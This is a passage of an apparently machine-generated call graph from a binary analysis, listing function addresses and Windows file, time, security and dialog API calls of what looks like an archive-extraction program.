10860->10862 10863 4098f7 3 API calls 10861->10863 10869 404032 10861->10869 10862->10861 11211 40e0b7 10862->11211 10865 404028 10863->10865 10867 40b2a9 16 API calls 10865->10867 10866 403fb7 10866->10861 11214 40e057 10866->11214 10867->10869 10868 40435c 10871 40bb56 20 API calls 10868->10871 10874 404345 10868->10874 10869->10868 10877 40422d 10869->10877 10881 404072 10869->10881 10870 4043f1 11145 409013 10870->11145 10871->10874 10874->10832 10874->10870 10875 405051 GetFileType 10874->10875 10876 4043c2 10875->10876 10876->10870 10878 4098f7 3 API calls 10876->10878 10877->10868 11122 404cf1 10877->11122 10880 4043d3 10878->10880 10883 40b2a9 16 API calls 10880->10883 10881->10828 10884 405898 6 API calls 10881->10884 10886 4043dd 10883->10886 10887 4040d9 10884->10887 10885 404478 10888 4044f2 10885->10888 10895 40451b 10885->10895 10896 40554a 35 API calls 10885->10896 11256 403471 10886->11256 10890 404186 10887->10890 11219 405767 10887->11219 10888->10895 11151 40551c 10888->11151 10890->10828 10897 4041c5 10890->10897 10892 40455d 10908 401264 35 API calls 10892->10908 10915 4045e5 10892->10915 10895->10892 10899 404591 10895->10899 10900 40457a 10895->10900 10896->10888 11231 405a5d 10897->11231 11271 411244 10899->11271 11261 4039b3 10900->11261 10902 4040f3 11225 4057bb 10902->11225 10903 404136 10906 4058ff 7 API calls 10903->10906 10904 4042b7 10904->10868 10912 4098f7 3 API calls 10904->10912 10910 404143 10906->10910 10908->10915 10911 405898 6 API calls 10910->10911 10913 404162 10911->10913 10916 4042dd 10912->10916 10913->10890 10920 40416c 10913->10920 10921 40418f 10913->10921 10914 4040fe 10914->10903 10917 404cf1 60 API calls 10914->10917 10919 4098f7 3 API calls 10915->10919 10923 404640 10915->10923 10918 40b2a9 16 API calls 10916->10918 10924 404132 10917->10924 10933 4042e7 10918->10933 10925 404636 10919->10925 10920->10890 10929 4057e8 3 API calls 10920->10929 10922 4098f7 3 API calls 10921->10922 10926 404199 10922->10926 10923->10832 10927 4046b2 10923->10927 11275 40503e SetEndOfFile 10923->11275 10924->10903 10928 40b2a9 16 API calls 10925->10928 10930 40b2a9 16 API calls 10926->10930 11158 4053c5 10927->11158 10928->10923 10929->10890 10930->10890 10936 4058ff 7 API calls 10933->10936 10934 4046f6 10935 404f2e 31 API calls 10934->10935 10939 404701 10935->10939 10937 404313 10936->10937 10938 404cf1 60 API calls 10937->10938 10940 404341 10938->10940 10939->10832 10941 4057e8 3 API calls 10939->10941 10940->10874 10942 4033db 19 API calls 10940->10942 10941->10832 10942->10868 10944 4076ad 10943->10944 10945 4076bc 10944->10945 11778 40da54 CompareStringA 10944->11778 10945->10658 10948 4077d0 10947->10948 10953 4077d6 10948->10953 11779 40da54 CompareStringA 10948->11779 10950 4077fe 10950->10953 11780 40da54 CompareStringA 10950->11780 10952 40792c 10952->10664 10953->10952 10954 40e144 MultiByteToWideChar 10953->10954 10954->10952 10956 4012aa ctype 2 API calls 10955->10956 10957 401b46 10956->10957 10958 4012aa ctype 2 API calls 10957->10958 10959 401b51 ctype 10958->10959 10961 4050ad 10960->10961 10962 406ea5 GetVersionExA 10961->10962 10963 4050ec 10962->10963 10964 405110 CreateFileA 10963->10964 10966 4050fc CreateFileW 10963->10966 10965 405124 10964->10965 10967 40512b GetLastError 10965->10967 10968 405136 10965->10968 10966->10965 10967->10968 10969 40517f 10968->10969 10970 40e115 WideCharToMultiByte 10968->10970 10969->10716 10970->10969 10974 4033ae 10971->10974 10975 4033b7 10974->10975 10976 4098f7 3 API calls 10975->10976 10977 4033cd 10976->10977 10978 40b2a9 16 API calls 10977->10978 10979 4033d4 10978->10979 10979->10717 10981 4056a2 10980->10981 10982 4056a7 10980->10982 10983 404fdc 33 API calls 10981->10983 10985 4056fa 10982->10985 10986 4056ef 10982->10986 10990 405704 10982->10990 11016 4052d2 10982->11016 10983->10982 10985->10721 11028 403456 10986->11028 10988 4054ed 35 API calls 10988->10990 10989 4052d2 4 API calls 10989->10990 10990->10985 10990->10988 10990->10989 11042 40a1ec GetProcessHeap RtlAllocateHeap 10991->11042 10993 403960 10994 4013bd 10993->10994 10995 403443 31 API calls 10993->10995 10996 404fdc SetFilePointer 10994->10996 10995->10994 10997 405000 GetLastError 10996->10997 10998 40501e 10996->10998 10997->10998 10999 40500a 10997->10999 10998->10731 10999->10998 11043 40336d 10999->11043 11002 4054ed 35 API calls 11001->11002 11003 401277 11002->11003 11003->10736 11003->10740 11005 404fdc 33 API calls 11004->11005 11006 40a7fa 11005->11006 11006->10746 11051 405351 11007->11051 11010 405518 11010->10725 11011 40336d 31 API calls 11011->11010 11013 40a82c 11012->11013 11014 40a81f 11012->11014 11013->10745 11015 4054ed 35 API calls 11014->11015 11015->11013 11017 4052e5 GetStdHandle 11016->11017 11018 4052f8 ReadFile 11016->11018 11017->11018 11020 405311 11018->11020 11027 40532c 11018->11027 11033 405051 11020->11033 11022 405318 11023 40532e 11022->11023 11025 405321 11022->11025 11024 405334 GetLastError 11023->11024 11023->11027 11024->11027 11026 4052d2 GetFileType 11025->11026 11026->11027 11027->10982 11037 403408 11028->11037 11031 40328f 31 API calls 11032 40346d 11031->11032 11032->10985 11034 405059 11033->11034 11035 40505c GetFileType 11033->11035 11034->11022 11036 405068 11035->11036 11036->11022 11038 4098f7 3 API calls 11037->11038 11039 403413 11038->11039 11040 40b2a9 16 API calls 11039->11040 11041 40341d 11040->11041 11041->11031 11042->10993 11044 40338f 11043->11044 11045 403379 11043->11045 11046 40328f 31 API calls 11044->11046 11047 4098f7 3 API calls 11045->11047 11048 40339b 11046->11048 11049 403387 11047->11049 11048->10998 11050 40b2a9 16 API calls 11049->11050 11050->11044 11052 4053ba 11051->11052 11055 40535e 11051->11055 11052->11010 11052->11011 11053 40538f SetFilePointer 11053->11052 11054 4053b0 GetLastError 11053->11054 11054->11052 11055->11053 11056 405381 11055->11056 11057 40537a 11055->11057 11061 40554a 11056->11061 11059 404fdc 33 API calls 11057->11059 11060 40537f 11059->11060 11060->11053 11062 40a7e9 33 API calls 11061->11062 11063 40555d 11062->11063 11064 4054ed 35 API calls 11063->11064 11065 40556a 11064->11065 11066 404fdc 33 API calls 11065->11066 11067 405571 11066->11067 11068 40a810 35 API calls 11067->11068 11069 40557d 11068->11069 11069->11060 11071 40df79 3 API calls 11070->11071 11072 40394c 11071->11072 11072->10667 11074 408d7c 11073->11074 11075 408d22 11073->11075 11076 401313 35 API calls 11074->11076 11082 408d57 11074->11082 11077 401313 35 API calls 11075->11077 11075->11082 11078 408d8a 11076->11078 11079 408d49 11077->11079 11080 40568a 39 API calls 11078->11080 11081 40568a 39 API calls 11079->11081 11080->11082 11081->11082 11082->10767 11084 40554a 35 API calls 11083->11084 11087 401b88 11084->11087 11085 4098f7 3 API calls 11088 401bbb 11085->11088 11086 401bc5 11086->10801 11087->11085 11087->11086 11089 40b2a9 16 API calls 11088->11089 11089->11086 11091 40bc5a 11090->11091 11092 40bc8f 11091->11092 11093 40bc84 IsWindowVisible 11091->11093 11095 40bc69 11091->11095 11094 40bc99 DialogBoxParamA 11092->11094 11092->11095 11093->11092 11094->11095 11095->10774 11098 402dd9 11096->11098 11099 402e56 11096->11099 11097 40e144 MultiByteToWideChar 11097->11099 11098->11097 11098->11099 11099->10763 11101 401711 11100->11101 11102 40171a 11100->11102 11103 401313 35 API calls 11101->11103 11102->10814 11103->11102 11104->10818 11106 40568a 39 API calls 11105->11106 11107 405762 11106->11107 11107->10806 11110 402b07 11108->11110 11109 402b6b 11109->10840 11110->11109 11276 402a9e 11110->11276 11112 402b30 11112->11109 11281 407046 11112->11281 11115 40bb61 11114->11115 11116 4098f7 3 API calls 11115->11116 11117 40bb6c 11116->11117 11307 40bb29 wvsprintfA 11117->11307 11120 40a82d 4 API calls 11121 403d92 11120->11121 11121->10828 11121->10847 11121->10855 11123 404d01 11122->11123 11124 405767 3 API calls 11123->11124 11138 404d18 11124->11138 11125 404e52 11126 404e61 11125->11126 11129 4051d8 4 API calls 11125->11129 11132 404292 11126->11132 11310 405b9b 11126->11310 11129->11126 11131 4058ff 7 API calls 11134 404ea4 11131->11134 11132->10868 11250 4033db 11132->11250 11133 405767 3 API calls 11133->11138 11135 404eb5 11134->11135 11136 404eab 11134->11136 11137 405866 3 API calls 11135->11137 11139 4051d8 4 API calls 11136->11139 11137->11132 11138->11125 11138->11132 11138->11133 11144 404d26 11138->11144 11345 404ab4 11138->11345 11139->11132 11142 404e76 11142->11125 11143 404e81 11143->11132 11144->11125 11144->11132 11144->11138 11144->11142 11144->11143 11313 404b4f 11144->11313 11338 40bb8a 11144->11338 11146 409024 11145->11146 11147 409046 11145->11147 11149 402dbd MultiByteToWideChar 11146->11149 11148 402dbd MultiByteToWideChar 11147->11148 11150 409044 11148->11150 11149->11150 11150->10885 11152 405351 35 API calls 11151->11152 11153 40552e 11152->11153 11154 405546 11153->11154 11352 40503e SetEndOfFile 11153->11352 11154->10895 11156 405539 11157 4054ed 35 API calls 11156->11157 11157->11154 11160 4053d7 11158->11160 11159 405416 11162 405427 11159->11162 11163 40de21 2 API calls 11159->11163 11160->11159 11353 40de21 SystemTimeToFileTime 11160->11353 11164 405436 SetFileTime 11162->11164 11165 40de21 2 API calls 11162->11165 11163->11162 11164->10934 11165->11164 11173 41127c 11166->11173 11167 4112fa 11168 404fdc 33 API calls 11167->11168 11169 411304 11168->11169 11170 41131b 11169->11170 11171 40554a 35 API calls 11169->11171 11172 404f2e 31 API calls 11170->11172 11171->11170 11177 411327 11172->11177 11173->11167 11174 4098f7 3 API calls 11173->11174 11175 4112f0 11174->11175 11176 40b2a9 16 API calls 11175->11176 11176->11167 11178 4077c1 2 API calls 11177->11178 11192 41137d 11178->11192 11179 405097 CreateFileW CreateFileA GetLastError GetVersionExA WideCharToMultiByte 11179->11192 11181 411453 11366 40bd2a 11181->11366 11182 4114a5 11185 4098f7 3 API calls 11182->11185 11187 4114ac 11185->11187 11191 40b2a9 16 API calls 11187->11191 11188 411473 11374 402737 11188->11374 11189 4114e6 11190 401ce5 51 API calls 11189->11190 11197 41147b 11190->11197 11194 4114b9 11191->11194 11192->11179 11192->11182 11195 4077c1 2 API calls 11192->11195 11201 41144a 11192->11201 11356 41125e 11192->11356 11196 405097 5 API calls 11194->11196 11195->11192 11199 4114d1 11196->11199 11202 4054ed 35 API calls 11197->11202 11203 41151e 11197->11203 11198 4114df 11198->10823 11200 4054ed 35 API calls 11199->11200 11200->11198 11359 401851 11201->11359 11202->11203 11203->11198 11204 40554a 35 API calls 11203->11204 11204->11198 11206 403862 11205->11206 11207 403841 11205->11207 11208 403883 11206->11208 11409 40357e 11206->11409 11207->11206 11393 403785 11207->11393 11208->10830 11508 40e087 11211->11508 11213 40e0c3 11213->10866 11215 40e024 2 API calls 11214->11215 11216 40e065 11215->11216 11217 40e024 2 API calls 11216->11217 11218 40e070 11217->11218 11218->10861 11220 406ea5 GetVersionExA 11219->11220 11221 40576c 11220->11221 11222 405787 GetFileAttributesA 11221->11222 11224 40577e GetFileAttributesW 11221->11224 11223 4040ec 11222->11223 11223->10902 11223->10903 11224->11223 11226 406ea5 GetVersionExA 11225->11226 11227 4057c0 11226->11227 11228 4057db GetFileAttributesA 11227->11228 11230 4057d2 GetFileAttributesW 11227->11230 11229 4057e5 11228->11229 11229->10914 11230->11229 11232 406ea5 GetVersionExA 11231->11232 11234 405a6b 11232->11234 11233 405b8c 11233->10828 11234->11233 11235 4057bb 3 API calls 11234->11235 11236 405ab9 11235->11236 11237 405adb 11236->11237 11238 4057e8 3 API calls 11236->11238 11517 407374 11237->11517 11238->11237 11240 405aec CreateFileW 11240->11233 11241 405b10 11240->11241 11242 405b21 11241->11242 11243 40de21 2 API calls 11241->11243 11244 405b32 11242->11244 11245 40de21 2 API calls 11242->11245 11243->11242 11246 405b43 SetFileTime CloseHandle 11244->11246 11247 40de21 2 API calls 11244->11247 11245->11244 11246->11233 11248 405b80 11246->11248 11247->11246 11249 4057e8 3 API calls 11248->11249 11249->11233 11251 4033e4 11250->11251 11252 4098f7 3 API calls 11251->11252 11253 4033fa 11252->11253 11254 40b2a9 16 API calls 11253->11254 11255 403401 11254->11255 11255->10904 11521 403423 11256->11521 11259 40328f 31 API calls 11260 40348a 11259->11260 11260->10870 11262 403952 33 API calls 11261->11262 11263 4039c8 11262->11263 11526 4090ae 11263->11526 11265 4039d7 11268 403a23 11265->11268 11270 4090ae 59 API calls 11265->11270 11535 409210 11265->11535 11266 403a2e 11266->10892 11267 40a205 ctype 2 API calls 11267->11266 11268->11266 11268->11267 11270->11265 11272 41124b 11271->11272 11273 41125b 11272->11273 11577 410d74 11272->11577 11273->10892 11275->10927 11291 402981 11276->11291 11279 402981 2 API calls 11280 402aba 11279->11280 11280->11112 11282 40706e 11281->11282 11289 40713d 11281->11289 11288 407088 11282->11288 11302 406f2b 11282->11302 11285 40709e 11285->11112 11287 407122 11287->11285 11296 406f4d 11287->11296 11288->11285 11288->11287 11288->11289 11290 406f2b CompareStringA 11288->11290 11289->11285 11295 40da75 CompareStringA 11289->11295 11290->11289 11293 40298f 11291->11293 11292 4029bd 11292->11279 11292->11280 11293->11292 11294 407046 2 API calls 11293->11294 11294->11293 11295->11287 11298 406f56 11296->11298 11297 406ef6 CharUpperA 11297->11298 11298->11297 11299 406fa1 11298->11299 11301 406f90 11298->11301 11300 406f4d CharUpperA 11299->11300 11299->11301 11300->11299 11301->11285 11303 406f44 11302->11303 11305 406f3d 11302->11305 11306 40da75 CompareStringA 11303->11306 11305->11288 11306->11305 11308 40ad46 12 API calls 11307->11308 11309 40bb54 11308->11309 11309->11120 11311 4057e8 3 API calls 11310->11311 11312 404e9c 11311->11312 11312->11131 11314 404b5c 11313->11314 11315 406045 15 API calls 11314->11315 11316 404b80 11315->11316 11336 404cd9 ctype 11316->11336 11350 40da54 CompareStringA 11316->11350 11318 404bb9 11318->11336 11351 40da54 CompareStringA 11318->11351 11320 404bd4 11321 40a610 wvsprintfA 11320->11321 11322 405767 3 API calls 11320->11322 11323 404c27 11320->11323 11320->11336 11321->11320 11322->11320 11324 405767 3 API calls 11323->11324 11325 404c35 11324->11325 11326 404c6a MoveFileA 11325->11326 11325->11336 11327 404c84 11326->11327 11326->11336 11328 405767 3 API calls 11327->11328 11329 404c99 11328->11329 11330 404caf MoveFileA 11329->11330 11331 4051d8 4 API calls 11329->11331 11332 404cc3 11330->11332 11330->11336 11333 404cad 11331->11333 11334 404f2e 31 API calls 11332->11334 11333->11330 11335 404cce 11334->11335 11337 404fac 31 API calls 11335->11337 11336->11144 11337->11336 11341 40bb94 11338->11341 11339 40bbc8 DialogBoxParamA 11339->11341 11340 40bc44 SetFileAttributesA 11342 40bc0e 11340->11342 11341->11339 11341->11340 11341->11342 11343 40bc3d 11341->11343 11344 40bbef DialogBoxParamA 11341->11344 11342->11144 11343->11340 11344->11341 11344->11342 11346 404ac7 11345->11346 11347 404ace 11346->11347 11348 40a610 wvsprintfA 11346->11348 11349 405767 3 API calls 11346->11349 11347->11138 11348->11346 11349->11346 11350->11318 11351->11320 11352->11156 11354 40de79 11353->11354 11355 40de7c LocalFileTimeToFileTime 11353->11355 11354->11355 11355->11159 11381 40bd07 DialogBoxParamA 11356->11381 11358 411267 11358->11192 11360 401357 51 API calls 11359->11360 11361 40185d 11360->11361 11362 401872 11361->11362 11363 4098f7 3 API calls 11361->11363 11362->11181 11364 401868 11363->11364 11365 40b2a9 16 API calls 11364->11365 11365->11362 11367 40bd39 11366->11367 11368 4098f7 3 API calls 11367->11368 11369 40bd60 11368->11369 11370 40a610 wvsprintfA 11369->11370 11371 40bd6d 11370->11371 11382 40bcf7 11371->11382 11375 401ce5 51 API calls 11374->11375 11379 402744 11375->11379 11376 402783 11376->11197 11378 401264 35 API calls 11378->11379 11379->11376 11379->11378 11380 401ce5 51 API calls 11379->11380 11385 40ddca 11379->11385 11380->11379 11381->11358 11383 40bb29 13 API calls 11382->11383 11384 40bd02 11383->11384 11384->11188 11384->11189 11386 40ddd3 11385->11386 11387 40dddf 11385->11387 11391 40a6b0 GetTickCount 11386->11391 11392 40a6b0 GetTickCount 11387->11392 11390 40dde9 11390->11379 11391->11387 11392->11390 11394 406ea5 GetVersionExA 11393->11394 11395 403790 11394->11395 11396 403828 11395->11396 11433 402511 11395->11433 11396->11206 11398 4037b4 11408 403803 11398->11408 11468 4034aa 11398->11468 11401 40a205 ctype 2 API calls 11401->11396 11402 4037d4 SetFileSecurityW 11404 4037e8 11402->11404 11403 4037df SetFileSecurityA 11403->11404 11405 4098f7 3 API calls 11404->11405 11404->11408 11406 4037f9 11405->11406 11407 40b2a9 16 API calls 11406->11407 11407->11408 11408->11396 11408->11401 11410 40358b 11409->11410 11411 406ea5 GetVersionExA 11410->11411 11412 403590 11411->11412 11413 40e144 MultiByteToWideChar 11412->11413 11414 40365e ctype 11412->11414 11415 4035a7 11412->11415 11413->11415 11414->11208 11415->11414 11416 406045 15 API calls 11415->11416 11417 40369a 11416->11417 11418 4036b5 11417->11418 11419 4057e8 3 API calls 11417->11419 11420 40e115 WideCharToMultiByte 11418->11420 11419->11418 11421 4036cd 11420->11421 11500 405299 11421->11500 11424 402511 65 API calls 11425 403707 11424->11425 11426 403716 11425->11426 11428 404f2e 31 API calls 11425->11428 11427 40375b 11426->11427 11429 405097 5 API calls 11426->11429 11430 4057e8 3 API calls 11427->11430 11428->11426 11431 403736 11429->11431 11430->11414 11431->11427 11432 40373a SetFileTime 11431->11432 11432->11427 11434 40251e 11433->11434 11435 402533 11434->11435 11443 40255a 11434->11443 11436 4098f7 3 API calls 11435->11436 11437 40253d 11436->11437 11439 40b2a9 16 API calls 11437->11439 11438 4098f7 3 API calls 11440 402722 11438->11440 11442 402547 11439->11442 11441 40b2a9 16 API calls 11440->11441 11441->11442 11442->11398 11443->11442 11444 40fe4c 2 API calls 11443->11444 11463 402713 11443->11463 11445 4025b0 11444->11445 11446 410b78 35 API calls 11445->11446 11447 4025bc 11446->11447 11448 401708 35 API calls 11447->11448 11449 4025cf 11447->11449 11448->11449 11450 4026fb 11449->11450 11451 409013 MultiByteToWideChar 11449->11451 11452 402638 11449->11452 11478 41020a 11450->11478 11451->11452 11454 4026a2 11452->11454 11455 402699 11452->11455 11456 411244 65 API calls 11454->11456 11457 4039b3 65 API calls 11455->11457 11458 4026a0 11456->11458 11457->11458 11459 4026c5 11458->11459 11460 402708 11458->11460 11462 4098f7 3 API calls 11459->11462 11461 41020a 2 API calls 11460->11461 11461->11463 11464 4026d6 11462->11464 11463->11438 11465 40b2a9 16 API calls 11464->11465 11466 4026e0 11465->11466 11466->11450 11467 40dbcb 2 API calls 11466->11467 11467->11450 11469 403553 11468->11469 11470 4034bf GetCurrentProcess OpenProcessToken 11468->11470 11469->11402 11469->11403 11470->11469 11471 4034dd LookupPrivilegeValueA 11470->11471 11472 403509 AdjustTokenPrivileges 11471->11472 11473 40352b LookupPrivilegeValueA 11471->11473 11472->11473 11474 40351a GetLastError 11472->11474 11475 403548 CloseHandle 11473->11475 11476 40353b AdjustTokenPrivileges 11473->11476 11474->11473 11477 403524 11474->11477 11475->11469 11476->11475 11477->11473 11479 410217 11478->11479 11484 410226 11478->11484 11479->11484 11494 40a65b 11479->11494 11480 41018e 2 API calls 11482 41022e 11480->11482 11483 4012aa ctype 2 API calls 11482->11483 11485 410239 11483->11485 11484->11480 11486 4012aa ctype 2 API calls 11485->11486 11487 410244 11486->11487 11488 4012aa ctype 2 API calls 11487->11488 11489 41024f 11488->11489 11497 407ae8 11489->11497 11495 40a205 ctype 2 API calls 11494->11495 11496 40a666 11495->11496 11496->11484 11498 40a65b ctype 2 API calls 11497->11498 11499 407af3 11498->11499 11501 4051d8 4 API calls 11500->11501 11503 4052aa 11501->11503 11502 4036f2 11502->11424 11502->11426 11503->11502 11505 40349c 11503->11505 11506 4033db 19 API calls 11505->11506 11507 4034a7 11506->11507 11507->11502 11513 40e024 11508->11513 11510 40e095 11511 40e024 2 API calls 11510->11511 11512 40e0a0 11511->11512 11512->11213 11514 40e036 11513->11514 11516 40e030 11513->11516 11515 40de21 2 API calls 11514->11515 11515->11516 11516->11510 11518 40737e 11517->11518 11519 40e144 MultiByteToWideChar 11518->11519 11520 407384 11518->11520 11519->11520 11520->11240 11522 4098f7 3 API calls 11521->11522 11523 40342e 11522->11523 11524 40b2a9 16 API calls 11523->11524 11525 403438 11524->11525 11525->11259 11527 409194 11526->11527 11534 4090cd 11526->11534 11528 4091c8 11527->11528 11541 408f88 11527->11541 11530 40ddca GetTickCount 11528->11530 11531 4091f9 11530->11531 11531->11265 11532 40568a 39 API calls 11532->11534 11533 41126f 58 API calls 11533->11534 11534->11527 11534->11531 11534->11532 11534->11533 11536 409240 11535->11536 11538 409229 11535->11538 11536->11538 11555 405585 11536->11555 11539 40ddca GetTickCount 11538->11539 11540 409278 11539->11540 11540->11265 11542 408f91 11541->11542 11543 408fed 11541->11543 11542->11543 11545 40b305 11542->11545 11543->11528 11550 40b283 11545->11550 11547 40b31a 11548 40a82d 4 API calls 11547->11548 11549 40b31f 11548->11549 11549->11543 11553 40a8f1 11550->11553 11554 40a8fe SendDlgItemMessageA 11553->11554 11554->11547 11556 40567f 11555->11556 11557 405596 11555->11557 11556->11538 11558 4055a9 GetStdHandle 11557->11558 11566 4055b2 11557->11566 11558->11566 11559 405601 WriteFile 11559->11566 11560 4055d7 11561 4055d9 WriteFile 11560->11561 11560->11566 11561->11560 11561->11566 11563 405672 11564 403471 31 API calls 11563->11564 11564->11556 11565 404fdc 33 API calls 11565->11566 11566->11556 11566->11559 11566->11560 11566->11561 11566->11563 11566->11565 11567 4054ed 35 API calls 11566->11567 11568 403304 11566->11568 11567->11566 11569 403313 11568->11569 11570 403367 11568->11570 11571 4098f7 3 API calls 11569->11571 11570->11566 11572 40331f 11571->11572 11573 40a610 wvsprintfA 11572->11573 11574 40332c GetLastError 11573->11574 11575 4098f7 3 API calls 11574->11575 11576 403340 MessageBoxA SetLastError 11575->11576 11576->11570 11579 410d89 11577->11579 11578 410a90 2 API calls 11581 410df1 11578->11581 11579->11578 11595 410e16 11579->11595 11580 40e95b 59 API calls 11580->11595 11620 40e95b 11581->11620 11583 410ee2 11609 410748 11583->11609 11584 410748 48 API calls 11584->11595 11586 40fc8d 59 API calls 11586->11595 11587 41121e 11587->11273 11589 411227 11657 40f9e1 11589->11657 11594 40ff05 59 API calls 11594->11595 11595->11580 11595->11583 11595->11584 11595->11586 11595->11587 11595->11589 11595->11594 11597 410bbe 11595->11597 11633 410cb3 11595->11633 11653 41026d 11595->11653 11598 410bce 11597->11598 11599 403952 33 API calls 11598->11599 11602 410c31 11599->11602 11600 410c7c 11662 4102ca 11600->11662 11602->11600 11604 40e95b 59 API calls 11602->11604 11607 410ca1 11602->11607 11604->11602 11605 410c9a 11605->11595 11606 40a205 ctype 2 API calls 11606->11605 11607->11605 11608 40a205 ctype 2 API calls 11607->11608 11608->11605 11610 410a44 11609->11610 11616 410777 11609->11616 11611 40fb53 42 API calls 11610->11611 11613 410a52 11611->11613 11613->11587 11614 40dbcb GetProcessHeap RtlFreeHeap 11614->11616 11615 401708 35 API calls 11615->11616 11616->11610 11616->11613 11616->11614 11616->11615 11617 409210 42 API calls 11616->11617 11618 40faf1 37 API calls 11616->11618 11619 40fee6 GetProcessHeap RtlFreeHeap 11616->11619 11724 40fb53 11616->11724 11617->11616 11618->11616 11619->11616 11621 40e96d 11620->11621 11622 40e971 11620->11622 11621->11587 11621->11595 11624 40ff05 11621->11624 11623 4090ae 59 API calls 11622->11623 11623->11621 11625 40ff1e 11624->11625 11627 40ff23 11624->11627 11626 40e95b 59 API calls 11625->11626 11626->11627 11628 40ff49 11627->11628 11630 40ff68 ctype 11627->11630 11632 40ff63 11627->11632 11737 40fbea 11628->11737 11631 40e95b 59 API calls 11630->11631 11630->11632 11631->11630 11632->11595 11772 40fc8d 11633->11772 11636 410cd5 11636->11595 11637 410cf5 11640 410cec 11637->11640 11641 40fc8d 59 API calls 11637->11641 11638 410ce5 11639 40fc8d 59 API calls 11638->11639 11639->11640 11640->11636 11642 403952 33 API calls 11640->11642 11643 410d01 11641->11643 11648 410d20 11642->11648 11643->11636 11645 40fc8d 59 API calls 11643->11645 11644 410d41 11647 4102ca 37 API calls 11644->11647 11645->11640 11646 40fc8d 59 API calls 11646->11648 11649 410d4e 11647->11649 11648->11644 11648->11646 11650 410d61 11648->11650 11649->11636 11651 40a205 ctype 2 API calls 11649->11651 11650->11636 11652 40a205 ctype 2 API calls 11650->11652 11651->11636 11652->11636 11654 410276 11653->11654 11655 4102bc 11654->11655 11656 40ff05 59 API calls 11654->11656 11655->11595 11656->11655 11658 40e546 2 API calls 11657->11658 11659 40f9f2 11658->11659 11660 40e55a 35 API calls 11659->11660 11661 40f9fb 11660->11661 11661->11583 11663 40609f 2 API calls 11662->11663 11664 4102dd 11663->11664 11701 407afc 11664->11701 11666 41030c 11668 41032b 11666->11668 11671 41018e 2 API calls 11666->11671 11667 4105ec 11715 4060b4 11667->11715 11668->11667 11669 40a668 2 API calls 11668->11669 11673 41036b 11669->11673 11671->11668 11672 4105f4 11672->11605 11672->11606 11673->11667 11674 40eb33 35 API calls 11673->11674 11675 4103e6 11673->11675 11676 41039d 11674->11676 11677 40eb33 35 API calls 11675->11677 11682 41045c ctype 11675->11682 11678 40a668 2 API calls 11676->11678 11677->11682 11679 4103a4 11678->11679 11680 40eb33 35 API calls 11679->11680 11680->11675 11681 4105e0 11683 410628 11681->11683 11684 401313 35 API calls 11681->11684 11682->11667 11682->11681 11687 403952 33 API calls 11682->11687 11685 40dbcb 2 API calls 11683->11685 11698 41064e ctype 11683->11698 11684->11683 11686 410645 11685->11686 11688 401313 35 API calls 11686->11688 11692 41058f 11687->11692 11688->11698 11689 4105c3 11705 408974 11689->11705 11690 4105e2 11690->11667 11694 40a205 ctype 2 API calls 11690->11694 11692->11689 11692->11690 11694->11667 11695 40a205 ctype 2 API calls 11695->11681 11696 410739 11697 4060b4 2 API calls 11696->11697 11697->11672 11698->11667 11698->11696 11699 401313 35 API calls 11698->11699 11700 410700 11698->11700 11699->11700 11700->11667 11700->11696 11702 407b05 11701->11702 11704 407b0f 11701->11704 11703 40a668 2 API calls 11702->11703 11703->11704 11704->11666 11708 40898f 11705->11708 11706 408b9d 11707 407cf7 35 API calls 11706->11707 11710 408ba6 11707->11710 11708->11706 11713 4089ea 11708->11713 11718 407cf7 11708->11718 11710->11681 11710->11695 11711 407cf7 35 API calls 11714 408a8e 11711->11714 11712 401313 35 API calls 11712->11713 11713->11706 11713->11712 11713->11714 11714->11706 11714->11711 11716 40a65b ctype 2 API calls 11715->11716 11717 4060bc 11716->11717 11717->11672 11719 407d38 11718->11719 11720 407d0b 11718->11720 11719->11713 11721 40a224 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapReAlloc 11720->11721 11722 407d28 11721->11722 11722->11719 11723 403443 31 API calls 11722->11723 11723->11719 11725 40fb63 11724->11725 11726 40fb9e 11724->11726 11725->11726 11727 40fb6c 11725->11727 11728 40e9d5 42 API calls 11726->11728 11733 40e9d5 11727->11733 11730 40fb95 11728->11730 11730->11616 11732 40e9d5 42 API calls 11732->11730 11734 40ea1f 11733->11734 11735 40e9f5 11733->11735 11734->11732 11735->11734 11736 409210 42 API calls 11735->11736 11736->11734 11751 40fab8 11737->11751 11740 40fc11 11742 40fc21 11740->11742 11743 40fab8 59 API calls 11740->11743 11750 40fc5a 11740->11750 11741 40fab8 59 API calls 11741->11740 11755 40fbb6 11742->11755 11743->11742 11746 40fc55 11759 40e546 11746->11759 11747 40fc69 11763 40e55a 11747->11763 11750->11632 11752 40fac3 11751->11752 11753 40fac8 11751->11753 11754 40e95b 59 API calls 11752->11754 11753->11740 11753->11741 11754->11753 11757 40fbcf 11755->11757 11756 40fab8 59 API calls 11756->11757 11757->11756 11758 40fbe5 11757->11758 11758->11746 11758->11747 11758->11750 11760 40e559 11759->11760 11761 40e54b 11759->11761 11760->11750 11762 40a205 ctype 2 API calls 11761->11762 11762->11760 11764 40e56d 11763->11764 11765 40e569 11763->11765 11766 40e546 2 API calls 11764->11766 11765->11750 11767 40e573 11766->11767 11771 40a1ec GetProcessHeap RtlAllocateHeap 11767->11771 11769 40e589 11769->11765 11770 403443 31 API calls 11769->11770 11770->11765 11771->11769 11773 40fcc6 11772->11773 11774 40fca1 11772->11774 11773->11636 11773->11637 11773->11638 11774->11773 11775 40fd01 11774->11775 11776 40fab8 59 API calls 11774->11776 11775->11773 11777 40fab8 59 API calls 11775->11777 11776->11774 11777->11775 11778->10945 11779->10950 11780->10953 11782 40aca1 3 API calls 11781->11782 11783 40ad2e 11782->11783 11784 40ace4 3 API calls 11783->11784 11785 40ad3a 11783->11785 11784->11785 11785->10270 11785->10271 11786->10274 11788 40ad13 11787->11788 11789 40aced GetDC 11787->11789 11788->10280 11789->11788 11790 40acfc GetDeviceCaps ReleaseDC 11789->11790 11790->11788 11792 40acd0 11791->11792 11793 40acaa GetDC 11791->11793 11792->10280 11793->11792 11794 40acb9 GetDeviceCaps ReleaseDC 11793->11794 11794->11792 11796 40ac23 11795->11796 11797 40ac26 9 API calls 11795->11797 11796->11797 11797->10283 11799 4051ac 24 API calls 11798->11799 11800 401894 11799->11800 11801 401357 51 API calls 11800->11801 11803 401898 11800->11803 11802 4018a5 11801->11802 11802->11803 11804 4098f7 3 API calls 11802->11804 11809 4018cb 11803->11809 11805 4018b0 11804->11805 11806 40b2a9 16 API calls 11805->11806 11807 4018ba 11806->11807 11808 404f2e 31 API calls 11807->11808 11808->11803 11810 4018e4 11809->11810 11831 4018dd 11809->11831 11811 40a7e9 33 API calls 11810->11811 11812 4018ee 